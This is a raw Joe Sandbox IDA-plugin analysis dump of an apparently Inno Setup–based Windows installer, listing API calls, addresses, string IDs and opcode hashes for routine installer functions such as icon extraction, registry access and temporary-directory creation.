                                                                                  • API String ID: 1646373207-2130885113
                                                                                  • Opcode ID: 8a728ce11e9b8acd7ee0e88331664095462ef5fb6b1690cb1722d2ba2dad7e7d
                                                                                  • Instruction ID: 110c83de3d6355277510abd5b52a320a2c8dd2afbae334eef16c728cb9d202ef
                                                                                  • Opcode Fuzzy Hash: 8a728ce11e9b8acd7ee0e88331664095462ef5fb6b1690cb1722d2ba2dad7e7d
                                                                                  • Instruction Fuzzy Hash: 5E01DF70644645AFD300BF769C02F2A3A58E705B9BF60447BFC00A62D3CA7C8A0CCA2D
                                                                                  APIs
                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004672CB
                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004672F1
                                                                                    • Part of subcall function 00467168: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467200
                                                                                    • Part of subcall function 00467168: DestroyCursor.USER32(00000000), ref: 00467216
                                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467348
                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004673A9
                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004673CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                  • String ID: c:\directory$shell32.dll
                                                                                  • API String ID: 3376378930-1375355148
                                                                                  • Opcode ID: 8ba974db7d431cfc828555254f055e085d4bb255e1d8418bde2e11c534446a10
                                                                                  • Instruction ID: 712749594264273e91c57dfa4baa87cbb3c5fbf3a827f6648ccfc37e71b26823
                                                                                  • Opcode Fuzzy Hash: 8ba974db7d431cfc828555254f055e085d4bb255e1d8418bde2e11c534446a10
                                                                                  • Instruction Fuzzy Hash: 3B515F70604204AFDB10EF65CC89FDEB7E8AB48308F1041B7F80897351D6389E80DB59
                                                                                  APIs
                                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004309BC
                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004309CB
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004309E5
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00430A06
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                  • API String ID: 4130936913-2943970505
                                                                                  • Opcode ID: c544fb85ff372cb1e77a17e690d9a21f18419a27c2c54a515182e1a09c276035
                                                                                  • Instruction ID: 7bf223393b5a8c163278de6a14ca069cc176d79392cc0efa73562a49209d61c7
                                                                                  • Opcode Fuzzy Hash: c544fb85ff372cb1e77a17e690d9a21f18419a27c2c54a515182e1a09c276035
                                                                                  • Instruction Fuzzy Hash: 2FF082709583409BC300FB6598427197BE0AB58308F00567FB458A2291E77C9900CB5F
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,004552A0,004552A0,00000031,004552A0,00000000), ref: 0045522E
                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,004552A0,004552A0,00000031,004552A0), ref: 0045523B
                                                                                    • Part of subcall function 00454FF0: WaitForInputIdle.USER32(00000001,00000032), ref: 0045501C
                                                                                    • Part of subcall function 00454FF0: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045503E
                                                                                    • Part of subcall function 00454FF0: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 0045504D
                                                                                    • Part of subcall function 00454FF0: CloseHandle.KERNEL32(00000001,0045507A,00455073,?,00000031,00000080,00000000,?,?,004553D3,00000080,0000003C,00000000,004553E9), ref: 0045506D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                  • API String ID: 854858120-615399546
                                                                                  • Opcode ID: a12f25e84c64b35caf56505833b4763bf51916e1d96f6a3c0ca2e673e5a5c59b
                                                                                  • Instruction ID: fd2d6d40b6f8736679a78553b36ca572aba09dccd5489fff61a9141705bf80db
                                                                                  • Opcode Fuzzy Hash: a12f25e84c64b35caf56505833b4763bf51916e1d96f6a3c0ca2e673e5a5c59b
                                                                                  • Instruction Fuzzy Hash: 26516D30A0071DABDF01EF95C852BEEBBB9AF44345F50407BF804B7282D7785A098B59
                                                                                  APIs
                                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                  • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                                  • String ID: 2$MAINICON
                                                                                  • API String ID: 3935243913-3181700818
                                                                                  • Opcode ID: 72b5214bae903583b5150e9e2b4ebf56f0403f519bf97ede8b6dad9a93120e9e
                                                                                  • Instruction ID: 6f4b3398584102735ad00b8493fe389bc1dbaef6f787fac7706901cc0cbf584f
                                                                                  • Opcode Fuzzy Hash: 72b5214bae903583b5150e9e2b4ebf56f0403f519bf97ede8b6dad9a93120e9e
                                                                                  • Instruction Fuzzy Hash: 23319370A042549ADF10EF69C8C57C67BE8AF14308F4441BAE844DB393D7BED988CB69
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                    • Part of subcall function 004230D8: GetDC.USER32(00000000), ref: 0042312E
                                                                                    • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410470,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                    • Part of subcall function 004230D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423149
                                                                                    • Part of subcall function 004230D8: ReleaseDC.USER32(00000000,00000000), ref: 00423154
                                                                                    • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                    • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                    • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                    • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                    • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                    • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                  • API String ID: 316262546-2767913252
                                                                                  • Opcode ID: 13d9bdced9750e67f73d93ec74d54abaa35f495c5bba4d3cc3e2f323313cf858
                                                                                  • Instruction ID: b4be2cf3334f9eeef2f7e30357217019d1f7f37f78cfa945b19fc5b38c57745f
                                                                                  • Opcode Fuzzy Hash: 13d9bdced9750e67f73d93ec74d54abaa35f495c5bba4d3cc3e2f323313cf858
                                                                                  • Instruction Fuzzy Hash: CE112CB06142409BC740FF66998278A7BE1AB68308F40943FF848E7291DB3DAD458B1E
                                                                                  APIs
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$Prop
                                                                                  • String ID:
                                                                                  • API String ID: 3887896539-0
                                                                                  • Opcode ID: 34b367db4fa110d3f73a4511ae8beb0e64a5e5a51f2810bc4cb64f6c76f31942
                                                                                  • Instruction ID: 3f72449cbd34e5f3a25e72b7cfa2937fee5ee0203059de802df544128507dfad
                                                                                  • Opcode Fuzzy Hash: 34b367db4fa110d3f73a4511ae8beb0e64a5e5a51f2810bc4cb64f6c76f31942
                                                                                  • Instruction Fuzzy Hash: DA11CC76100244BFDF00DF99DC84E9A37E8AB19364F104266B918DB3E2D739E9909B99
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455917,?,00000000,00455957), ref: 0045585D
                                                                                  Strings
                                                                                  • PendingFileRenameOperations2, xrefs: 0045582C
                                                                                  • WININIT.INI, xrefs: 0045588C
                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004557E0
                                                                                  • PendingFileRenameOperations, xrefs: 004557FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                  • API String ID: 47109696-2199428270
                                                                                  • Opcode ID: 9f13e54b28b117c6c951523ac57e4ec8eff7d48dd1f3fb754fdced39f25454b8
                                                                                  • Instruction ID: 0edf169a16dfa4fb7533b8b55fc7b889579560f25e46b257abcc71cf1b5dc2f9
                                                                                  • Opcode Fuzzy Hash: 9f13e54b28b117c6c951523ac57e4ec8eff7d48dd1f3fb754fdced39f25454b8
                                                                                  • Instruction Fuzzy Hash: AB519874E00608DBDB10EF62DC51AEEB7B9EF44315F50847BEC04A7292DB7CAA45CA58
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047D16E,?,?,00000000,0049C628,00000000,00000000,?,00498C11,00000000,00498DBA,?,00000000), ref: 0047D0AB
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047D16E,?,?,00000000,0049C628,00000000,00000000,?,00498C11,00000000,00498DBA,?,00000000), ref: 0047D0B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                  • API String ID: 1375471231-2952887711
                                                                                  • Opcode ID: a1715584ba94e4ec2e60fd9adbe39064ab1430a51d48f091bd4064c668cb3361
                                                                                  • Instruction ID: c65adf921b1b6e4579252068e4265065b5a45be28dde5098669b3b5892976db2
                                                                                  • Opcode Fuzzy Hash: a1715584ba94e4ec2e60fd9adbe39064ab1430a51d48f091bd4064c668cb3361
                                                                                  • Instruction Fuzzy Hash: F9411674E101099BDB01EF95DC82ADEB7B9EF45309F50853BE81477392DB38AE058B68
                                                                                  APIs
                                                                                  • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                  • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                  • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnumLongWindows
                                                                                  • String ID: lAB
                                                                                  • API String ID: 4191631535-3476862382
                                                                                  • Opcode ID: 7dcdbb5f1d382cba8886e06331430e6d6fce3cff686b988b3074a9d4c358ab09
                                                                                  • Instruction ID: 1d232068e43b915345d7588b37cc7287aafbcd058231e570564fb52883b43028
                                                                                  • Opcode Fuzzy Hash: 7dcdbb5f1d382cba8886e06331430e6d6fce3cff686b988b3074a9d4c358ab09
                                                                                  • Instruction Fuzzy Hash: E3115E70704610ABDB10AF28DC85F5A77E8EB08725F50026AF9A49B2E7C378DD40CB58
                                                                                  APIs
                                                                                  • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,00497F35), ref: 0042DE7B
                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                  • API String ID: 588496660-1846899949
                                                                                  • Opcode ID: 780e4264db312733bee64b8429de1b59d21d94b92bca9a45197840037c94c444
                                                                                  • Instruction ID: 9cada17f2adbafa0ebcb77ec43832f820b82eaaa71c9ca0bcc52793b6cf27115
                                                                                  • Opcode Fuzzy Hash: 780e4264db312733bee64b8429de1b59d21d94b92bca9a45197840037c94c444
                                                                                  • Instruction Fuzzy Hash: EFE065B1B40A70BAD62036657C89B972718DB79325F615537F105A91D182BC1C40CE9C
                                                                                  Strings
                                                                                  • NextButtonClick, xrefs: 0046BD4C
                                                                                  • Need to restart Windows? %s, xrefs: 0046BF95
                                                                                  • PrepareToInstall failed: %s, xrefs: 0046BF6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                  • API String ID: 0-2329492092
                                                                                  • Opcode ID: 2482342cf09780f3cc85a79916584030efb236fd66ea0455236200f368d4c793
                                                                                  • Instruction ID: 9b4fd168f37c7da821868febde12ed9d5c4eb704a6c877b85ca6115e961808cc
                                                                                  • Opcode Fuzzy Hash: 2482342cf09780f3cc85a79916584030efb236fd66ea0455236200f368d4c793
                                                                                  • Instruction Fuzzy Hash: ECD12B34A00109DFCB10EFA9D585AEE77F5EF49304F6440BAE404AB352E778AE45CB5A
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?,?,00000000,004838B9), ref: 0048368C
                                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0048372A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveChangeNotifyWindow
                                                                                  • String ID: $Need to restart Windows? %s
                                                                                  • API String ID: 1160245247-4200181552
                                                                                  • Opcode ID: 1d42271db157847063bc1684c76a3f1b571b73f0fbe1024385b2a1440cdba256
                                                                                  • Instruction ID: ac7489165aebe6410750fc54bddbdfbbf0a744a872c0faa15b6e968571d36d29
                                                                                  • Opcode Fuzzy Hash: 1d42271db157847063bc1684c76a3f1b571b73f0fbe1024385b2a1440cdba256
                                                                                  • Instruction Fuzzy Hash: 2891B274A042449FCB11FF69D885B9D7BE0AF59709F0044BBE8009B362D778AE49CB5E
                                                                                  APIs
                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                  • GetLastError.KERNEL32(00000000,0046FED1,?,?,0049D1E0,00000000), ref: 0046FDAE
                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FE28
                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FE4D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                  • String ID: Creating directory: %s
                                                                                  • API String ID: 2451617938-483064649
                                                                                  • Opcode ID: 117d1655f334007bf170a7645c0ff38e0762150d831baea0a8383fbe162a65f0
                                                                                  • Instruction ID: bfe09206507b5b37383d903e763d781286b330fb05695de0be9d4a8a79558abe
                                                                                  • Opcode Fuzzy Hash: 117d1655f334007bf170a7645c0ff38e0762150d831baea0a8383fbe162a65f0
                                                                                  • Instruction Fuzzy Hash: 73513074E00248ABDB01DBA5D982BDEBBF5AF48304F50857AE840B7392D7795E08CB59
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454EF6
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454FBC), ref: 00454F60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
